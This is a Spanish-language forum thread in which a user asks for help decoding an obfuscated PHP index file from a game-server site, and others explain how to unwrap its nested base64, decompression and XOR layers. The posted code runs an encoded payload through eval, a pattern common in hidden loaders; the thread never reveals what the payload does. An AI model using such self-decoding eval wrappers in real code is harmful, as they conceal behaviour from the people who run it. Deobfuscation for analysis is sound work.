Decodificar

Iniciado por giancarlos19, 13 Marzo 2013, 04:21 AM

0 Miembros y 1 Visitante están viendo este tema.

giancarlos19

Aver quien me ayuda a decodificar este index que esta en base64 pero ami parecer esta ofuscado mas de 1 vez.

<?php
$o
="QABIOzh3b3cKDSgoAAAeLSgoA0EnKjkAGCd/TWZjYn8nUGJlAAAQJwNHV2hwAABidWJjJ2V+J0hqZnVKR3RzMABidQAAAycDJ1NiZmpXYnVyQW5paAAAJyEnQ0JfU1VIQEZKQlVUJwAwVGhhc3BmdWJ0DgAQAzdwcHApQPhtCcBqcilkaGoBsAAxAfMAAB4tA0FjYmEAAm5pYi8lVEJUVE5ISVhJB7AlAAArJyVjYTJGNTA+T0RCVVJ/AABkd0YlLjwKDQoNaGVYdHNmEAB1cy8A8XRidHRuaGlYaWZqYnAALwQZAdkC9woNbmEvbnR0YnMvIwAAWEBCU1wld3Jla25kJVouLgAOCg18Cg0OdHBuc2RvAe4BoAHhDgBCZGZ0YiclZGZ3AlBmJSc9AYAOAAF1YnZybnViWGhpZGIvJX8RgQCAf3BiZShka2YGoHQoRFNKWESsQAMjKQFCKSFwDNIODiMB2Cc6J2licHIAJwEoDjICWyo5BLRYTmpmYGIvNjQEEDcrJzUyDvEODmJ/bhFzDg5ldRQBYmZsEwAOCzRraGBoQHJua2MLX6/wC19iC1NLA0ULfwpRAfYLmAFGC7kBVio5VG84JWhwAPEB9AsfDQ56Cg0AMAoNFX9iFXIAOEZpc24qQWtoaEMUhgK/ArNUYnMGAXNuaWB0Ap8avGtoZmMpbmlkAp+CZAKSa2ZpYHIW4HQoAKUClgoNHDJTYgPAandrZnNiELgBNQ6yAlJAYmlidWZwHWsCSAEkAjdEdWhpTWhlAjgBJAI3VwiRBYEqOVViYydQZB8DCGwqOVNXS1gopofwA85GbWZ/BHIBrgkUAdcFrhwhA3I4OQ==";eval(base64_decode("JGxsbD0wO2V2YWwoYmFzZTY0X2RlY29kZSgiSkd4c2JHeHNiR3hzYkd4c1BTZGlZWE5sTmpSZlpHVmpiMlJsSnpzPSIpKTskbGw9MDtldmFsKCRsbGxsbGxsbGxsbCgiSkd4c2JHeHNiR3hzYkd3OUoyOXlaQ2M3IikpOyRsbGxsPTA7JGxsbGxsPTM7ZXZhbCgkbGxsbGxsbGxsbGwoIkpHdzlKR3hzYkd4c2JHeHNiR3hzS0NSdktUcz0iKSk7JGxsbGxsbGw9MDskbGxsbGxsPSgkbGxsbGxsbGxsbCgkbFsxXSk8PDgpKyRsbGxsbGxsbGxsKCRsWzJdKTtldmFsKCRsbGxsbGxsbGxsbCgiSkd4c2JHeHNiR3hzYkd4c2JHdzlKM04wY214bGJpYzciKSk7JGxsbGxsbGxsbD0xNjskbGxsbGxsbGw9IiI7Zm9yKDskbGxsbGw8JGxsbGxsbGxsbGxsbGwoJGwpOyl7aWYoJGxsbGxsbGxsbD09MCl7JGxsbGxsbD0oJGxsbGxsbGxsbGwoJGxbJGxsbGxsKytdKTw8OCk7JGxsbGxsbCs9JGxsbGxsbGxsbGwoJGxbJGxsbGxsKytdKTskbGxsbGxsbGxsPTE2O31pZigkbGxsbGxsJjB4ODAwMCl7JGxsbD0oJGxsbGxsbGxsbGwoJGxbJGxsbGxsKytdKTw8NCk7JGxsbCs9KCRsbGxsbGxsbGxsKCRsWyRsbGxsbF0pPj40KTtpZigkbGxsKXskbGw9KCRsbGxsbGxsbGxsKCRsWyRsbGxsbCsrXSkmMHgwZikrMztmb3IoJGxsbGw9MDskbGxsbDwkbGw7JGxsbGwrKykkbGxsbGxsbGxbJGxsbGxsbGwrJGxsbGxdPSRsbGxsbGxsbFskbGxsbGxsbC0kbGxsKyRsbGxsXTskbGxsbGxsbCs9JGxsO31lbHNleyRsbD0oJGxsbGxsbGxsbGwoJGxbJGxsbGxsKytdKTw8OCk7JGxsKz0kbGxsbGxsbGxsbCgkbFskbGxsbGwrK10pKzE2O2ZvcigkbGxsbD0wOyRsbGxsPCRsbDskbGxsbGxsbGxbJGxsbGxsbGwrJGxsbGwrK109JGxsbGxsbGxsbGwoJGxbJGxsbGxsXSkpOyRsbGxsbCsrOyRsbGxsbGxsKz0kbGw7fX1lbHNlJGxsbGxsbGxsWyRsbGxsbGxsKytdPSRsbGxsbGxsbGxsKCRsWyRsbGxsbCsrXSk7JGxsbGxsbDw8PTE7JGxsbGxsbGxsbC0tO31ldmFsKCRsbGxsbGxsbGxsbCgiSkd4c2JHeHNiR3hzYkd4c2JEMG5ZMmh5SnpzPSIpKTskbGxsbGw9MDtldmFsKCRsbGxsbGxsbGxsbCgiSkd4c2JHeHNiR3hzYkQwaVB5SXVKR3hzYkd4c2JHeHNiR3hzYkNnMk1pazciKSk7JGxsbGxsbGxsbGw9IiI7Zm9yKDskbGxsbGw8JGxsbGxsbGw7KXskbGxsbGxsbGxsbC49JGxsbGxsbGxsbGxsbCgkbGxsbGxsbGxbJGxsbGxsKytdXjB4MDcpO31ldmFsKCRsbGxsbGxsbGxsbCgiSkd4c2JHeHNiR3hzYkM0OUpHeHNiR3hzYkd4c2JHd3VKR3hzYkd4c2JHeHNiR3hzYkNnMk1Da3VJajhpT3c9PSIpKTtldmFsKCRsbGxsbGxsbGwpOw=="));return;?>


de ante mano muchas gracias.

giancarlos19

Nadies sabe como decodificar ?? :S

Shell Root

Sólo tienes ese pedazo de código? Muestralo todo!
Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.

it3r

pues si como dices esta ofuscado mas de una vez y la verdad es mucho trabajo el tratar de volverlo a texto claro, a menos de que fuera indispensable, me evitaria el cansancio xD.

Pero de todas maneras tienes que ir quitando los eval() y decodificar el codigo que esta en base64.

Como ejemplo, cambiando el eval por un echo del base64_decode, queda así:

Código (php) [Seleccionar]

$lll=0;eval(base64_decode("JGxsbGxsbGxsbGxsPSdiYXNlNjRfZGVjb2RlJzs="));$ll=0;eval($lllllllllll("JGxsbGxsbGxsbGw9J29yZCc7"));$llll=0;$lllll=3;eval($lllllllllll("JGw9JGxsbGxsbGxsbGxsKCRvKTs="));$lllllll=0;$llllll=($llllllllll($l[1])<<8)+$llllllllll($l[2]);eval($lllllllllll("JGxsbGxsbGxsbGxsbGw9J3N0cmxlbic7"));$lllllllll=16;$llllllll="";for(;$lllll<$lllllllllllll($l);){if($lllllllll==0){$llllll=($llllllllll($l[$lllll++])<<8);$llllll+=$llllllllll($l[$lllll++]);$lllllllll=16;}if($llllll&0x8000){$lll=($llllllllll($l[$lllll++])<<4);$lll+=($llllllllll($l[$lllll])>>4);if($lll){$ll=($llllllllll($l[$lllll++])&0x0f)+3;for($llll=0;$llll<$ll;$llll++)$llllllll[$lllllll+$llll]=$llllllll[$lllllll-$lll+$llll];$lllllll+=$ll;}else{$ll=($llllllllll($l[$lllll++])<<8);$ll+=$llllllllll($l[$lllll++])+16;for($llll=0;$llll<$ll;$llllllll[$lllllll+$llll++]=$llllllllll($l[$lllll]));$lllll++;$lllllll+=$ll;}}else$llllllll[$lllllll++]=$llllllllll($l[$lllll++]);$llllll<<=1;$lllllllll--;}eval($lllllllllll("JGxsbGxsbGxsbGxsbD0nY2hyJzs="));$lllll=0;eval($lllllllllll("JGxsbGxsbGxsbD0iPyIuJGxsbGxsbGxsbGxsbCg2Mik7"));$llllllllll="";for(;$lllll<$lllllll;){$llllllllll.=$llllllllllll($llllllll[$lllll++]^0x07);}eval($lllllllllll("JGxsbGxsbGxsbC49JGxsbGxsbGxsbGwuJGxsbGxsbGxsbGxsbCg2MCkuIj8iOw=="));eval($lllllllll);


Igual no parece un archivo muy grande así que si dale no mas :)

Saludos.

Shell Root

De donde sacaste el código?

Código (php) [Seleccionar]
<?php
    $lll 
0;
    
# eval(base64_decode("JGxsbGxsbGxsbGxsPSdiYXNlNjRfZGVjb2RlJzs="));
    
$lllllllllll='base64_decode';
    
$ll 0;
    
#eval($lllllllllll("JGxsbGxsbGxsbGw9J29yZCc7"));
    
$llllllllll='ord';
    
$llll  0;
    
$lllll 3;
    
#eval($lllllllllll("JGw9JGxsbGxsbGxsbGxsKCRvKTs="));
    
$l=$lllllllllll($o);
    
$lllllll 0;
    
$llllll  = ($llllllllll($l[1]) << 8) + $llllllllll($l[2]);
    
#eval($lllllllllll("JGxsbGxsbGxsbGxsbGw9J3N0cmxlbic7"));
    
$lllllllllllll='strlen';
    
$lllllllll 16;
    
$llllllll  "";
    for (; 
$lllll $lllllllllllll($l);) {
        if (
$lllllllll == 0) {
            
$llllll = ($llllllllll($l[$lllll++]) << 8);
            
$llllll += $llllllllll($l[$lllll++]);
            
$lllllllll 16;
        }
        if (
$llllll 0x8000) {
            
$lll = ($llllllllll($l[$lllll++]) << 4);
            
$lll += ($llllllllll($l[$lllll]) >> 4);
            if (
$lll) {
                
$ll = ($llllllllll($l[$lllll++]) & 0x0f) + 3;
                for (
$llll 0$llll $ll$llll++)
                    
$llllllll[$lllllll $llll] = $llllllll[$lllllll $lll $llll];
                
$lllllll += $ll;
            } else {
                
$ll = ($llllllllll($l[$lllll++]) << 8);
                
$ll += $llllllllll($l[$lllll++]) + 16;
                for (
$llll 0$llll $ll$llllllll[$lllllll $llll++] = $llllllllll($l[$lllll]));
                
$lllll++;
                
$lllllll += $ll;
            }
        } else
            
$llllllll[$lllllll++] = $llllllllll($l[$lllll++]);
        
$llllll <<= 1;
        
$lllllllll--;
    }
    
#eval($lllllllllll("JGxsbGxsbGxsbGxsbD0nY2hyJzs="));
    
$llllllllllll='chr';
    
$lllll 0;
    
#eval($lllllllllll("JGxsbGxsbGxsbD0iPyIuJGxsbGxsbGxsbGxsbCg2Mik7"));
    
$lllllllll="?".$llllllllllll(62);
    
$llllllllll "";
    for (; 
$lllll $lllllll;) {
        
$llllllllll .= $llllllllllll($llllllll[$lllll++] ^ 0x07);
    }
    
#eval($lllllllllll("JGxsbGxsbGxsbC49JGxsbGxsbGxsbGwuJGxsbGxsbGxsbGxsbCg2MCkuIj8iOw=="));
    
$lllllllll.=$llllllllll.$llllllllllll(60)."?";
    eval(
$lllllllll);
?>
Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.

giancarlos19

Es una web de un servidor de juegos..
http://mu-meteor.com/